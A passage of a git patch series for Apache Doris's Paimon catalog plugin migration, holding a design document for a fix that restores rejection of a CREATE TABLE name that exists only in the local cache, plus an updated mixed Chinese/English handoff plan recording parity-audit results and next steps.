supported"; legacy `PaimonMetadataOps:314-333` throws `UnsupportedOperationException` — cosmetic type/msg diff); editlog↔cache order reversed (NIT, one synchronized DDL, replay-equivalent); error-code collapse to generic `DdlException` (cosmetic, all ops) = [DV-034](./deviations-log.md). +- ✅ **TRACE ANALYZE / column-stats — PARITY_HOLDS**: `getColumnStatistic` returns `Optional.empty()` on BOTH sides (neither paimon side overrides it; only `ExternalView`/`ExternalTable`/`HMSExternalTable` do); `createAnalysisTask` byte-identical (`PaimonExternalTable:204-207` vs `PluginDrivenExternalTable:429-433`); `ExternalAnalysisTask` engine-agnostic. Empty fallback is **generic to the bridge, shared with legacy paimon → not a regression**; native lake column-stats would be a cross-connector enhancement, not parity. +- ✅ **CHECK split-count accounting — PARITY_HOLDS**: post-sub-split `selectedSplitNum` set in shared parent `FileQueryScanNode:419` (after `super.createScanRangeLocations`), read by `StmtExecutor:686-688` gated `instanceof FileScanNode` — identical both sides; legacy reaches the same via `PaimonScanNode:464 splits.addAll(...)`. No under/double-count. batch-mode unreachable for paimon both sides. 2 divergences both **pre-date #9** + non-correctness: EXPLAIN `inputSplitNum`/`scanRanges` line absent (`PluginDrivenScanNode:229` skips super, MINOR/cosmetic; SqlBlockRuleMgr reads the field not EXPLAIN); compress-suffix guard absent (NIT, native arm gated to `.orc`/`.parquet` → always PLAIN, can't fire). +- ⬜ **跨连接器 follow-up** ([DV-028]/[DV-030]/[DV-031]/[DV-032]/[DV-033]/**[DV-034]**) — hudi/iceberg full-adopter same seams; future batch close (NOT this round). The D-056 bridge fix already closes the createTable-local-conflict seam for ALL plugin connectors. + +### P3-fix. FIX-CREATE-TABLE-LOCAL-CONFLICT — createTable drops legacy local-conflict rejection (MAJOR correctness) +- **✅ DONE** (2026-06-12; design [`P5-fix-CREATE-TABLE-LOCAL-CONFLICT-design.md`](./tasks/designs/P5-fix-CREATE-TABLE-LOCAL-CONFLICT-design.md), [D-056](./decisions-log.md), [DV-034](./deviations-log.md)). User signed off: **convert to FIX now**. +- **Root cause**: generic fe-core bridge `PluginDrivenExternalCatalog.createTable:293-309` collapses legacy `PaimonMetadataOps.performCreateTable:182-214`'s ordered remote-then-local probe into one `exists` OR consumed ONLY by the IF-NOT-EXISTS branch; the `!IF NOT EXISTS` path ignores it → a table present only in the local FE cache (case-fold under `lower_case_meta_names`, absent on a case-sensitive remote) is CREATED remotely instead of rejected with `ERR_TABLE_EXISTS_ERROR`. Silent metadata corruption; narrow/backend-dependent trigger. +- **Fix (1 fe-core file)**: split `exists` into `remoteExists`/`localExists`; `!IF NOT EXISTS` + `localExists` → `ErrorReport.reportDdlException(ERR_TABLE_EXISTS_ERROR, name)` (legacy local-arm). Remote-only conflict unchanged (case A). Option-2 surgical; zero SPI/connector/BE/RFC. +- **Gates**: fe-core `PluginDrivenExternalCatalogDdlRoutingTest` **fail-before exactly the 1 new test red** → **pass-after 26/0/0**, checkstyle 0. Real e2e = CI-gated (`lower_case_meta_names=1` + case-variant CREATE on case-sensitive paimon catalog; legacy paimon DDL regression covers the BE/contract). --- diff --git a/plan-doc/tasks/designs/P5-fix-CREATE-TABLE-LOCAL-CONFLICT-design.md b/plan-doc/tasks/designs/P5-fix-CREATE-TABLE-LOCAL-CONFLICT-design.md new file mode 100644 index 00000000000000..2139e7dae13774 --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-CREATE-TABLE-LOCAL-CONFLICT-design.md @@ -0,0 +1,179 @@ +# Problem + +A P3 coverage-gap audit (plugin-vs-legacy Paimon DDL parity, adversarially verified) found one real +divergence: the generic fe-core bridge `PluginDrivenExternalCatalog.createTable` silently drops legacy's +**local-conflict rejection** on the `CREATE TABLE` path. + +When a table exists **only in the local FE cache** (i.e. absent on the remote) and the statement has **no +`IF NOT EXISTS`**, legacy rejects with `ERR_TABLE_EXISTS_ERROR` (1050). The plugin bridge instead falls +through and calls `metadata.createTable`, which — because the table is absent remotely — **creates a +duplicate remote table** rather than failing. This is silent metadata corruption. + +This is the generic bridge shared by all plugin connectors (paimon today; MaxCompute + future iceberg/hudi), +so the gap is not paimon-specific. The trigger is narrow but real: +`lower_case_meta_names` set (non-default) + `CREATE TABLE ` (no `IF NOT EXISTS`) whose folded +name already exists locally but whose exact case does **not** exist on a **case-sensitive** remote (paimon +filesystem/jdbc catalogs are case-sensitive; HMS lowercases, so it is unaffected). + +# Root Cause (confirmed in current code) + +**Legacy** `PaimonMetadataOps.performCreateTable` (`fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonMetadataOps.java:182-214`) +does an **ordered two-probe**: +1. remote (`tableExist`, `:190`) → on hit: `IF NOT EXISTS` returns `true`, else `ERR_TABLE_EXISTS_ERROR` (`:195`); +2. local (`db.getTableNullable`, `:206`) → on hit: `IF NOT EXISTS` returns `true`, else `ERR_TABLE_EXISTS_ERROR` (`:212`). + +The comment at `:199-205` documents the local probe is **specifically** for `lower_case_meta_names` where a +case-variant name folds onto an existing local table while the case-sensitive remote has no such table. +`db.getTableNullable` does the case-fold lookup (`ExternalDatabase.java`, +`finalName = lowerCaseToTableName.get(tableName.toLowerCase())`). + +**Plugin bridge** `PluginDrivenExternalCatalog.createTable` +(`fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java:293-309`) collapses +both probes into one boolean: + +```java +boolean exists = metadata.getTableHandle(session, db.getRemoteName(), tableName).isPresent() + || db.getTableNullable(tableName) != null; +if (exists && createTableInfo.isIfNotExists()) { // :296 — exists consumed ONLY here + return true; +} +// !IF NOT EXISTS: falls straight through to metadata.createTable (:306) +``` + +`exists` is consumed **only** by the `IF NOT EXISTS` branch (`:296`). The `!IF NOT EXISTS` path (`:303-309`) +ignores `exists` and unconditionally calls `metadata.createTable`. So: + +| case | remote | local | IF NOT EXISTS | legacy | plugin (current) | +|------|--------|-------|---------------|--------|------------------| +| A | hit | — | no | ERR_TABLE_EXISTS (1050) | reject via connector throw → generic `DdlException` ("already exists") | +| B | **miss** | **hit** | no | **ERR_TABLE_EXISTS (1050)** | **creates duplicate remote table** ← BUG | +| both | hit/miss | hit/miss | yes | return true | return true | + +Only **case B** is a behavioral divergence (silent create vs reject). Case A already rejects with the same +error class and user-visible "already exists" message (only the typed error *code* differs — a pre-existing, +broadly-applicable cosmetic item the audit classified as non-divergent, out of scope here). + +# Design + +**Surgical (Rule 3): add the missing local-conflict guard; do not touch the remote-hit path.** + +Split the single `exists` OR back into its two arms so the `!IF NOT EXISTS` path can distinguish a +local-only conflict (must reject at FE) from a remote conflict (let the connector throw, unchanged): + +```java +boolean remoteExists = metadata.getTableHandle(session, db.getRemoteName(), + createTableInfo.getTableName()).isPresent(); +boolean localExists = db.getTableNullable(createTableInfo.getTableName()) != null; +if (remoteExists || localExists) { + if (createTableInfo.isIfNotExists()) { + LOG.info("create table[...] which already exists; skipping (IF NOT EXISTS)", ...); + return true; + } + // !IF NOT EXISTS: a table present ONLY in the local FE cache (folded onto an existing name + // under lower_case_meta_names while the case-sensitive remote has none) must be rejected + // HERE — connector.createTable would otherwise CREATE it remotely. Mirrors legacy + // PaimonMetadataOps.performCreateTable:206-214 (local arm). A remote conflict still falls + // through to connector.createTable, which throws "already exists" → DdlException (unchanged). + if (localExists) { + ErrorReport.reportDdlException(ErrorCode.ERR_TABLE_EXISTS_ERROR, + createTableInfo.getTableName()); + } +} +``` + +`ErrorReport.reportDdlException(ErrorCode.ERR_TABLE_EXISTS_ERROR, name)` is the exact legacy call; it throws +`DdlException` (subtype of the method's declared `UserException`). For case A (`remoteExists && !localExists`), +the guard does not fire and control falls through to `metadata.createTable` exactly as before. + +**Why not full parity (Option 1, rejected):** throwing `ERR_TABLE_EXISTS_ERROR` for the whole +`exists && !isIfNotExists` set would also retype case A's error (generic → 1050), but it (a) changes a case +that is **not** the confirmed divergence (case A already rejects correctly), (b) breaks an existing, +intentional test that codifies the remote-hit→connector behavior, and (c) is broader than the finding. The +residual case-A error-*code* genericness is pre-existing, applies to all four DDL ops uniformly, and was +marked non-divergent by the audit — left out of scope. + +# Implementation Plan + +**1. `fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java`** +- Add imports `org.apache.doris.common.ErrorCode`, `org.apache.doris.common.ErrorReport` (file already imports `DdlException` from the same package). +- Replace the single `exists` OR + `if (exists && isIfNotExists)` block (`:293-302`) with the split-probe + local-conflict-guard shown above. Update the now-stale inline comment at `:301-302`. + +Pure fe-core bridge change. **No SPI, no connector, no BE, no RFC.** No connector-import-rule concern (the +change is in fe-core). + +**2. `fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java`** +- Add one test `testCreateTableLocalConflictWithoutIfNotExistsRejects` (mirrors the existing local-arm test + `testCreateTableIfNotExistsExistingLocalTableReturnsTrue` but with `isIfNotExists=false`): remote + `getTableHandle` empty + local `getTableNullable` non-null + `!isIfNotExists` → asserts a `DdlException` + ("already exists") is thrown AND `metadata.createTable` is **never** called AND no edit log written. +- The static converter is mocked (as in `testCreateTableExistingTableWithoutIfNotExistsStillErrors`) so the + fail-before run cleanly distinguishes "fell through and created" from "rejected". + +# Risk Analysis + +- **Shared-code blast radius:** the change is in the generic bridge used by every plugin connector. It only + **adds** a rejection on a path that was previously a silent create; it cannot make a previously-succeeding + *correct* create fail (a local-only-conflict create was always wrong). Case A (remote-hit) is byte-for-byte + unchanged — the existing test `testCreateTableExistingTableWithoutIfNotExistsStillErrors` (remote-hit + + `!isIfNotExists`, no local stub → `localExists=false`) stays green. The two `IF NOT EXISTS` tests + (`...ExistingRemoteTableReturnsTrue...`, `...ExistingLocalTableReturnsTrue`) are unaffected (the + `isIfNotExists` branch is structurally identical). +- **`ErrorReport.reportDdlException` always throws**, so the subsequent fall-through to `metadata.createTable` + is reached only when `localExists` is false (remote-only conflict) — correct. +- **Parity scope:** restores case-B correctness to legacy. Residual: case-A error *code* stays generic + (pre-existing, out of scope, audit-classified cosmetic). +- **No editlog/replay impact:** the guard throws before any editlog write; rejected creates produce no log + entry on either side. + +# Test Plan + +## Unit Tests +- **New (fail-before / pass-after):** `PluginDrivenExternalCatalogDdlRoutingTest + .testCreateTableLocalConflictWithoutIfNotExistsRejects` — local-hit + remote-miss + `!IF NOT EXISTS` must + throw `DdlException` and never call `metadata.createTable`. WHY (Rule 9): encodes that a local-only + name-collision is rejected at FE, not silently created remotely. **Fail-before:** against unmodified source + the bridge falls through, calls `metadata.createTable`, returns false → `assertThrows` fails (nothing + thrown) and `verify(never createTable)` fails → RED. **Pass-after:** the guard throws → GREEN. +- **Regression (must stay green):** `testCreateTableExistingTableWithoutIfNotExistsStillErrors` (case A), + `testCreateTableIfNotExistsExistingRemoteTableReturnsTrueAndSkipsSideEffects`, + `testCreateTableIfNotExistsExistingLocalTableReturnsTrue`, and the rest of + `PluginDrivenExternalCatalogDdlRoutingTest`. + +Build/verify: `mvn -f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl :fe-core -am +-Dmaven.build.cache.enabled=false -DfailIfNoTests=false -Dtest=PluginDrivenExternalCatalogDdlRoutingTest test`; +read surefire XML + `MVN_EXIT`. fe-core checkstyle: `mvn -pl :fe-core checkstyle:check`. + +## E2E Tests +Live-only / CI-gated (real case-sensitive paimon filesystem/jdbc catalog + `lower_case_meta_names`): +`CREATE TABLE tbl1; CREATE TABLE TBL1;` (no `IF NOT EXISTS`) under `lower_case_meta_names=1` must fail with +"Table 'TBL1' already exists" rather than creating a second remote directory. Not runnable in the offline +unit harness (needs a live writable catalog); covered by the legacy paimon DDL regression contract. + +--- + +# ✅ IMPL SUMMARY (2026-06-12) + +**Status: DONE — fe-core build+UT green (`PluginDrivenExternalCatalogDdlRoutingTest` 26/0/0); checkstyle 0; committed.** + +## Fix (fe-core bridge only; zero SPI / connector / BE / RFC) +- `fe/fe-core/.../datasource/PluginDrivenExternalCatalog.java`: split the single `exists` OR into + `remoteExists` / `localExists`; under `!IF NOT EXISTS`, when `localExists` is true call + `ErrorReport.reportDdlException(ErrorCode.ERR_TABLE_EXISTS_ERROR, tableName)` (legacy local-arm parity, + `PaimonMetadataOps:206-214`). A remote-only conflict still falls through to `metadata.createTable` + (**case A unchanged**). +2 imports (`ErrorCode`, `ErrorReport`). + +## Tests +- New: `PluginDrivenExternalCatalogDdlRoutingTest.testCreateTableLocalConflictWithoutIfNotExistsRejects` + — local-hit + remote-miss + `!IF NOT EXISTS` → asserts `DdlException` thrown + `metadata.createTable` + never called + no edit log. +- **fail-before**: against unmodified source the new test is the only red + ("Expected DdlException…nothing was thrown") — 26 run, **1 fail**. **pass-after**: **26/0/0**. + The existing case-A test (`...ExistingTableWithoutIfNotExistsStillErrors`) + both IF-NOT-EXISTS tests + stay green (no regression in the shared bridge). + +## Scope boundary +- Option-2 surgical ([D-056](../../decisions-log.md)): only case-B correctness restored. +- Residual case-A (and all-DDL-op) typed-error-code collapse to generic `DdlException` = pre-existing, + out of scope = [DV-034](../../deviations-log.md), deferred to P4 cleanup / cross-connector batch. +- Generic bridge → the fix is inherently cross-connector (MaxCompute / future iceberg/hudi benefit), + partially closing P3 item-5 (cross-connector follow-up) for this specific seam. From 8dcd843179cba5afd76b45bc60cf989e1168499b Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 12:36:28 +0800 Subject: [PATCH 032/128] =?UTF-8?q?docs:=20checkpoint=20=E2=80=94=20P3=20c?= =?UTF-8?q?overage-gap=20verification=20complete=20(3=20parity=20+=20P3-fi?= =?UTF-8?q?x=20landed)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit P3 "go check" done via adversarial audit wf_25450c36-b7a: HMS-CONFRES / ANALYZE-stats / split-count all PARITY_HOLDS; DDL write surfaced one MAJOR correctness divergence -> FIX-CREATE-TABLE-LOCAL-CONFLICT (67a9b9da6e3). Updates HANDOFF for next steps (P4 cleanup / B8 legacy removal / cross-connector follow-up). No P0/P1/P2/P3 blockers remain. Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 79 ++++++++++++++++++++------------------------- 1 file changed, 35 insertions(+), 44 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 30ea28960d3770..f447a775128afe 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,37 +5,28 @@ --- -# 🎯 下一个 session 的任务 — **P2 全清;进入 P3 覆盖缺口核查(去查,非 fix)** +# 🎯 下一个 session 的任务 — **P3 覆盖缺口核查全完成(3 parity + 1 fix landed);进入 P4 cleanup 或 B8 legacy 删除** 第二轮 clean-room 对抗 review report:[`plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md`](./reviews/P5-paimon-rereview2-2026-06-11.md)。 -👉 **任务清单:[`plan-doc/task-list-P5-rereview2-fixes.md`](./task-list-P5-rereview2-fixes.md)** —— #1~#9 **全部完成**。 - -## ✅ 已完成(P0 BLOCKER + P1 MAJOR + P2 perf-parity 全清) -- **#1 `FIX-URI-NORMALIZE`** `20b19d19dd8` · **#2 `FIX-STATIC-CREDS-BE`** `d23d5df9914` · **#3 `FIX-SCHEMA-EVOLUTION`** `667f779af04` · **#4 `FIX-JDBC-DRIVER-URL`** `2d15b1b7ed7`(P0 全清) -- **#5 `FIX-MAPPING-FLAG-KEYS`** `9dcf6d1a9e5` · **#6 `FIX-KERBEROS-DOAS`** `2b1442fa57a` · **#7 `FIX-FORCE-JNI-SCANNER`** `05132a42768`(P1 全清) -- **#8 `FIX-COUNT-PUSHDOWN`**(M-2)`525be03371c` —— 见下。 -- **#9 `FIX-NATIVE-SUBSPLIT`**(M-3)`2f5f467f53d` —— 见下。 - -### #8 摘要 `FIX-COUNT-PUSHDOWN` — commit `525be03371c`([D-054]/[DV-032]/[RFC §25 E15]) -- **根因**:翻闸 plugin paimon `COUNT(*)` 结果正确但慢。recon(`wf_1ce48c93-325`):emit 缝(`PaimonScanRange.Builder.rowCount`→`paimon.row_count`→`setTableLevelRowCount`)+ COUNT 枚举→BE(`toThrift:90`/`PhysicalPlanTranslator:873`)**已建全**;唯缺**信号+计算**——`mergedRowCount()` 是 SDK-only(连接器算),COUNT 信号 `getPushDownAggNoGroupingOp()==COUNT` 只在 fe-core 节点、无人读 → 每 split 发 `-1` → BE 物化全行去 count。 -- **⚠️ 非纯连接器(更正动手前 framing)**:信号须过 SPI。**用户签字 proceed + SPI 改 + collapse-to-one**。修=3 文件:SPI `ConnectorScanPlanProvider` +1 default 7-arg `planScan(...,boolean countPushdown)`(委托 6-arg,其余连接器 no-op,[E15]);fe-core `PluginDrivenScanNode.getSplits` 读 agg-op 传入;连接器 `planScanInternal` count 短路第一臂 + `isCountPushdownSplit` + `buildCountRange`(**collapse-to-one**=legacy `<=10000` 路径普遍化)。legacy `>10000` 并行 trim 有意丢=[DV-032]。 -- **review `wf_6ead7c2c-b58`**:1 MAJOR(单-split 测 degenerate)已修→2-partition 非对称(2+3=5)fixture 钉 collapse+sum;2 MINOR 驳回。守门:连接器 252/0/0、fe-core compile+checkstyle 0、fail-before 恰 2 新测红。 - -### #9 摘要 `FIX-NATIVE-SUBSPLIT` — commit `2f5f467f53d`([D-055]/[DV-033],纯连接器零 SPI/零 fe-core) -- **根因**:大 native ORC/Parquet 文件得一个 scanner(无文件内并行);连接器每 RawFile 发整文件 range,legacy 经 `FileSplitter.splitFile` 切。recon(`wf_ad764bf6-1c9`):真 gap(ORC/Parquet PLAIN 可切);**DV×sub-split 安全**(DV rowid 全局行位、BE 部分 range 仍报全局位、`_kv_cache` 按 path+offset 共享、iceberg 同机制→**同一 DV 附每个 sub-range 不 re-base**);**纯连接器**(切分 math 5 session var via VariableMgr.toMap、连接器禁 import FileSplitter)。 -- **修=1 连接器文件**:2 纯静态 `computeFileSplitOffsets`(逐字移植含 **`>1.1D` 尾吸收 guard**)+ `determineTargetSplitSize`(移植 determineTargetFileSplitSize+applyMaxFileSplitNumLimit,省 isBatchMode→0)+ `sessionLong`/lazy `resolveTargetSplitSize` + native 臂 `buildNativeRanges` 内层 loop + `buildNativeRange(+start,+length)`。**count-pushdown splittable 闸**:非 count-eligible 的 native split 在 count pushdown 下保**整文件**(target=0,legacy `splittable=!applyCountPushdown` parity)。 -- **review `wf_4ac7479d-39d`**:2 confirmed 已修(① MINOR count-pushdown sub-split parity gap+假注释→加 count-pushdown 整文件闸;② MAJOR 缺 DV-on-every-sub-range 测→抽 `buildNativeRanges` + 测);2 驳回。守门:连接器 258/0/0、checkstyle 0、import-gate 净、fail-before 3 splitting 测红 + DV-only-first 测红。split-weight 调度 nicety 不移植(pre-existing)=[DV-033]。 - -## 🔜 下一个 session:**P3 覆盖缺口核查("去查",非 fix;查出真分歧才转 FIX)** -task-list §P3(completeness critic 标本轮未追): -1. **VERIFY `FIX-HMS-CONFRES`**:round-2 未复测 `hive.config.resources`/hive-site.xml 下流到 BE-facing scan props(round-1 MAJOR 的修)。确认到达 `getScanNodeProperties`(HMS/DLF)。 -2. **TRACE DDL 写路径 parity**:`PaimonConnectorMetadata.{createTable,dropTable,createDatabase,dropDatabase}`(`:683-797`) vs legacy `PaimonMetadataOps`;branch/tag DDL 写;IF-(NOT-)EXISTS 短路、editlog/cache-refresh 序、error-code parity。 -3. **TRACE ANALYZE/列统计**:`ExternalAnalysisTask`/`getColumnStatistic` parity(fetchRowCount 已核实忠实)。 -4. **CHECK split-count 计账**(`SqlBlockRuleMgr` 限额、batch-mode)—— 现 #9 已落 sub-split,复核 split 计数喂 SqlBlockRuleMgr 是否仍对([[catalog-spi-plugindriven-explain-override-gap]] 提过 split-count 须 startSplit+getSplits 两路设)。 -5. **跨连接器 follow-up**([DV-028]/[DV-030]/[DV-031])—— hudi/iceberg 同根因缝,将来批量 close(非本轮)。 - -⚠️ **P3 是「去查」不是「去改」**:查出真分歧 → AskUserQuestion 定是否转 FIX;否则记录「已核实 parity」即可。 -> P4 MINOR/NIT(review §5):一次性 cleanup;唯一真实数据边 = partition null-sentinel(`__HIVE_DEFAULT_PARTITION__`/`\N` 字面值被当 NULL)。 +👉 **任务清单:[`plan-doc/task-list-P5-rereview2-fixes.md`](./task-list-P5-rereview2-fixes.md)** —— #1~#9 全完成 + **P3 全核查完成 + P3-fix landed**。 + +## ✅ 本 session 完成(P3 覆盖缺口核查 + 1 个 fix) +P3「**去查不是去改**」:4 项 plugin-vs-legacy paimon parity,对抗 audit workflow `wf_25450c36-b7a`(tracer → 对抗 verifier → completeness critic)。**3/4 PARITY_HOLDS,1 揪出真分歧 → 用户签字转 FIX 并已落**。 + +- ✅ **VERIFY FIX-HMS-CONFRES — PARITY_HOLDS**:key 拼写恰 `hive.conf.resources`(**无** `hive.config.resources` 别名——疑似 MAPPING-FLAG-KEYS 类 bug **证伪**);round-1 wiring 全在;**BE-downflow**(round-2 没测的部分)两侧同——legacy HMS hive-site.xml 本就不入 BE scan props。 +- ✅ **TRACE ANALYZE/列统计 — PARITY_HOLDS**:`getColumnStatistic` 两侧 `Optional.empty()`、`createAnalysisTask` byte-同、`ExternalAnalysisTask` engine-agnostic;空 fallback generic 于桥、与 legacy paimon 共享 → 非 regression。 +- ✅ **CHECK split-count 计账 — PARITY_HOLDS**:post-sub-split 数经共享父 `FileQueryScanNode.selectedSplitNum` 喂 `SqlBlockRuleMgr` 两侧同;2 项 divergence 均 cosmetic/NIT 且 **pre-date #9**(EXPLAIN inputSplitNum 行缺 + compress-suffix guard 缺-不可触发)。 +- 🔴→✅ **DDL 写 parity — 1 REAL_DIVERGENCE(MAJOR) → FIXED**:见下 P3-fix。其余 6 aspect parity/NIT(branch/tag 两侧都拒、editlog↔cache 序反转=NIT、error-code collapse=cosmetic [DV-034])。 + +### P3-fix `FIX-CREATE-TABLE-LOCAL-CONFLICT` — commit `67a9b9da6e3`([D-056]/[DV-034],纯 fe-core 桥,零 SPI/连接器/BE) +- **根因**:通用桥 `PluginDrivenExternalCatalog.createTable:293-309` 把 legacy `PaimonMetadataOps.performCreateTable:182-214` 的有序双探(先 remote `tableExist:190` 后 local `getTableNullable:206`,任一命中+`!IF NOT EXISTS`→`ERR_TABLE_EXISTS_ERROR` 1050)合并成单 `exists` OR,且只被 IF NOT EXISTS 臂消费 → `!IF NOT EXISTS` 臂忽略它无条件调 `metadata.createTable`。后果:**local-cache 命中但 remote 缺**(`lower_case_meta_names` 下 case-variant 折叠到既有本地表、case-sensitive remote 无)+`!IF NOT EXISTS` 时 legacy 报 1050 拒绝、plugin **静默在 remote 建重复表**(元数据腐败)。窄+backend-dependent(filesystem/jdbc 才中、HMS 小写化两侧都拒)但 silent correctness。通用桥 → MaxCompute/未来 iceberg/hudi 同受益。 +- **修=1 fe-core 文件**:单 OR 拆回 `remoteExists`/`localExists` 两臂,`!IF NOT EXISTS`+`localExists`→`ErrorReport.reportDdlException(ERR_TABLE_EXISTS_ERROR,name)`(legacy local 臂逐字);remote-only 仍 fall-through 连接器抛(**case-A 不动**、既有 intentional 测绿)。Option-2 外科最小修;**否决 Option 1 full-parity**(改非分歧 case-A+破既有测+越界)。残留 case-A/全 DDL-op error-code-generic = [DV-034] 留 P4 cleanup。 +- **守门**:fe-core `PluginDrivenExternalCatalogDdlRoutingTest` **fail-before 恰 1 新测红**("Expected DdlException…nothing was thrown")→ **pass-after 26/0/0**、checkstyle 0。真值闸=live-e2e(`lower_case_meta_names=1`+case-variant CREATE 无 IF NOT EXISTS 于 case-sensitive paimon catalog;既有 legacy paimon DDL regression 覆盖契约、本 fix 无 BE 改)。 + +## 🔜 下一个 session:选其一(无 P0/P1/P2/P3 阻塞剩余) +1. **P4 MINOR/NIT 一次性 cleanup**(review §5):多为 display-only(DESC Key/Extra/uniqueId、VARCHAR(65533)→STRING、EXPLAIN delete-split 计账、error-message 文本含 [DV-034] 的 error-code collapse)/ perf-architectural / benign。**唯一真实数据边 = partition null-sentinel**(`__HIVE_DEFAULT_PARTITION__`/`\N` 字面值被当 NULL,`PaimonScanRange.java:212-225` / `ConnectorPartitionValues.java:32-54` vs legacy `source/PaimonScanNode.java:323-326`)——值得单独定夺。 +2. **B8 legacy `datasource/paimon/*` 删除**(迄今每个 fix 都靠它做 side-by-side parity;P3 后 parity 已全核完,可以删了)。删前确认无 live 引用。 +3. **跨连接器 follow-up 批量**([DV-028]/[DV-030]/[DV-031]/[DV-032]/[DV-033]/[DV-034])—— hudi/iceberg full-adopter 同根因缝,将来批量 close(D-056 已替所有 plugin 连接器关掉 createTable-local-conflict 这一缝)。 每条遵循 per-fix 流程(`step-by-step-fix` skill):设计 doc → 先拿当前代码复核 finding → 实现(连接器禁 import fe-core)→ build+UT(绝对 `-f`、**`-am`** 必带、读 surefire XML + `MVN_EXIT`、fail-before/pass-after)→ 独立 commit → SPI 改登 RFC + 用户签字入 decisions-log + 偏差入 deviations-log + 同步 task-list。 @@ -45,34 +36,34 @@ task-list §P3(completeness critic 标本轮未追): |---|---|---| | **P0 BLOCKER** | ✅1·✅2·✅3·✅4 | **全清** | | **P1 MAJOR** | ✅5·✅6·✅7 | **全清** | -| **P2 perf-parity** | ✅8.`FIX-COUNT-PUSHDOWN` · ✅9.`FIX-NATIVE-SUBSPLIT` | **全清**(#8 SPI+collapse-to-one;#9 纯连接器 sub-split)。各经 4-scout recon + 对抗 review,均揪出真 finding 已修。 | -| **P3 覆盖缺口(去查)** | ⬜ FIX-HMS-CONFRES 复验 · DDL 写 parity · ANALYZE · split-count 计账 · 跨连接器 follow-up | **下一个 session 起**。查出真分歧才转 FIX。 | -| **P4 MINOR/NIT** | 见 review §5 | 一次性 cleanup;partition null-sentinel 是唯一真实数据边。 | +| **P2 perf-parity** | ✅8.`FIX-COUNT-PUSHDOWN` · ✅9.`FIX-NATIVE-SUBSPLIT` | **全清** | +| **P3 覆盖缺口(去查)** | ✅ HMS-CONFRES parity · ✅ ANALYZE parity · ✅ split-count parity · ✅ DDL → `FIX-CREATE-TABLE-LOCAL-CONFLICT` landed `67a9b9da6e3` | **全完成**(3 parity + 1 fix;对抗 audit `wf_25450c36-b7a`) | +| **P4 MINOR/NIT** | ⬜ 见 review §5 | 一次性 cleanup;partition null-sentinel 是唯一真实数据边;error-code collapse [DV-034] 含其中。 | +| **B8 legacy 删除** | ⬜ | parity 已全核完,可删 `datasource/paimon/*`。 | --- # 📦 仓库状态 -- **HEAD = `2f5f467f53d`**(`fix: FIX-NATIVE-SUBSPLIT` #9)。其父 = `525be03371c`(#8 COUNT-PUSHDOWN)。**注意**:本 session 未单独打 `docs: checkpoint` commit——#8/#9 的 task-list/decisions/deviations/RFC/HANDOFF 已**折入各自 fix commit**(#9 fix commit 含 HANDOFF 外的全部 doc + #8 hash finalize)。本 HANDOFF 更新**未 commit**(下个 session 或现在可单独 `docs:` 提)。 +- **HEAD = `67a9b9da6e3`**(`fix: FIX-CREATE-TABLE-LOCAL-CONFLICT`,P3-derived)。其父 = `2f5f467f53d`(#9 NATIVE-SUBSPLIT)。本 HANDOFF 更新单独 `docs:` 提(见下条 commit)。 - ⚠️ **`regression-test/conf/regression-conf.groovy` 仍 modified-未 commit 且含明文 Aliyun key** —— commit 前继续 path-whitelist,**严禁 `git add -A`**。`regression-conf.groovy.bak` 同理排除。 - scratch 仍未 commit(`.audit-scratch/` `conf.cmy/` `META-INF/`)。 - 当前分支 `catalog-spi-07-paimon`(非 `master`)。 -- **legacy `datasource/paimon/*` 仍在树内**(B8 删除未做)→ 每个 fix 都能 side-by-side diff 做 parity。 -- 迁移链:…→`05132a42768`(#7)→`525be03371c`(#8 COUNT-PUSHDOWN)→`2f5f467f53d`(#9 NATIVE-SUBSPLIT, HEAD)。 +- **legacy `datasource/paimon/*` 仍在树内**(B8 删除未做)→ 仍可 side-by-side diff 做 parity(但 P3 后已无待核 parity,见上「下一步」选项 2)。 +- 迁移链:…→`2f5f467f53d`(#9 NATIVE-SUBSPLIT)→`67a9b9da6e3`(P3-fix CREATE-TABLE-LOCAL-CONFLICT, HEAD)。 ## ⚠️ Commit 须知(任何 `git add` 前必读) - **硬前置**:scrub `regression-test/conf/regression-conf.groovy`(明文 Aliyun key)+ 清 scratch(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。**path-whitelist `git add`,严禁 `git add -A`。** - 每个 fix 独立 commit;message = `fix: ` + 根因 + 解法 + 测试,末尾带 `Co-Authored-By: Claude Opus 4.8 (1M context) `。 -- 改 fe-core/SPI 的 fix:commit 须含连接器 + fe-core 两侧 + 测试(#8 即如此:SPI api + fe-core + 连接器)。#9 纯连接器单侧。 +- 改 fe-core/SPI 的 fix:commit 须含相关两侧 + 测试。本 P3-fix 纯 fe-core 桥单侧(含 test)。 ## ⚙️ 操作须知(复用) -- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。**`-am` 必带**(漏则报 `could not resolve fe-connector ${revision}` 假错)。改 fe-core 须单独 `-pl :fe-core -am`。**checkstyle**:连接器 `mvn -pl :fe-connector-paimon checkstyle:check`(exit 0 即净);fe-core `mvn -pl :fe-core checkstyle:check`。 -- 连接器禁 import fe-core:`bash tools/check-connector-imports.sh`(仅允许 `org.apache.doris.{thrift,connector,extension,filesystem}`)。 +- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。改 fe-core 须单独 `-pl :fe-core -am`。**checkstyle**:连接器 `mvn -pl :fe-connector-paimon 